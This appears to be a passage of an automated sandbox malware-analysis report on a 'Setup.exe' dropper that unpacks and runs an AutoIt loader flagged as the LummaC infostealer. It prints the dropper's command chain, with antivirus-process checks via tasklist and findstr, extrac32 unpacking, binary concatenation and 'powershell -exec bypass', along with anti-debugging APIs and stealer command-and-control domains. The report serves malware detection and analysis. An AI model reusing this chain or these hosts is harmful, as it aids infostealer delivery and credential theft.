            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_0026338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_0026338B
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_00285058 mov eax, dword ptr fs:[00000030h]11_2_00285058
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002C20AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,11_2_002C20AA
            Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_00292992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00292992
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_00280BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00280BAF
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_00280D45 SetUnhandledExceptionFilter,11_2_00280D45
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_00280F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00280F91

            HIPS / PFW / Operating System Protection Evasion

            barindex
            LummaC encrypted strings found
            Source: Hc.com, 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: bashfulacid.lat
            Source: Hc.com, 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tentabatte.lat
            Source: Hc.com, 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: curverpluch.lat
            Source: Hc.com, 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: talkynicer.lat
            Source: Hc.com, 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: shapestickyr.lat
            Source: Hc.com, 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: manyrestro.lat
            Source: Hc.com, 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: slipperyloo.lat
            Source: Hc.com, 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: wordyfindy.lat
            Source: Hc.com, 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: hungrypaster.click
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002C1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_002C1B4D
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_0026338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_0026338B
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002CBBED SendInput,keybd_event,11_2_002CBBED
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002CEC6C mouse_event,11_2_002CEC6C
            Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Clicks Clicks.cmd & Clicks.cmdJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 280366Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E AgreesJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Travels" Served Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Statement + ..\Avon + ..\Gnome + ..\Digital + ..\Clearing + ..\Flat + ..\Systems IJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\280366\Hc.com Hc.com IJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!doctype html> <!--[if lt ie 7]> <html class="no-js ie6 oldie" lang="en-us"> <![endif]--> <!--[if ie 7]> <html class="no-js ie7 oldie" lang="en-us"> <![endif]--> <!--[if ie 8]> <html class="no-js ie8 oldie" lang="en-us"> <![endif]--> <!--[if gt ie 8]><!--> <html class="no-js" lang="en-us"> <!--<![endif]--> <head> <title>suspected phishing site | cloudflare</title> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="x-ua-compatible" content="ie=edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt ie 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte ie 10]><!--> <script> if (!navigator.cookieenabled) { window.addeventlistener('domcontentloaded', function () { var cookieel = document.getelementbyid('cookie-alert'); cookieel.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> warning</h4> <h2 style="margin: 16px 0;">suspected phishing</h2> <strong>this website has been reported for potential phishing.</strong> <p>phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">learn more</a> <form action="/cdn-cgi/phish-bypass" method="get" enctype="text/plain"> <input type="hidden" name="atok" value="rskevrb4u02flfvl.7vqxymyvwenwhkb2ykr86bmjbm-1735000458-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">ignore & proceed</button> </form> </p> </div> <
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!doctype html> <!--[if lt ie 7]> <html class="no-js ie6 oldie" lang="en-us"> <![endif]--> <!--[if ie 7]> <html class="no-js ie7 oldie" lang="en-us"> <![endif]--> <!--[if ie 8]> <html class="no-js ie8 oldie" lang="en-us"> <![endif]--> <!--[if gt ie 8]><!--> <html class="no-js" lang="en-us"> <!--<![endif]--> <head> <title>suspected phishing site | cloudflare</title> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="x-ua-compatible" content="ie=edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt ie 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte ie 10]><!--> <script> if (!navigator.cookieenabled) { window.addeventlistener('domcontentloaded', function () { var cookieel = document.getelementbyid('cookie-alert'); cookieel.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> warning</h4> <h2 style="margin: 16px 0;">suspected phishing</h2> <strong>this website has been reported for potential phishing.</strong> <p>phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">learn more</a> <form action="/cdn-cgi/phish-bypass" method="get" enctype="text/plain"> <input type="hidden" name="atok" value="rskevrb4u02flfvl.7vqxymyvwenwhkb2ykr86bmjbm-1735000458-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">ignore & proceed</button> </form> </p> </div> <Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002C14AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,11_2_002C14AE
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002C1FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,11_2_002C1FB0
            Source: Hc.com, 0000000B.00000003.1997077230.0000000004809000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp, Hc.com.1.dr, Developers.8.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: Hc.comBinary or memory string: Shell_TrayWnd
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_00280A08 cpuid 11_2_00280A08
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
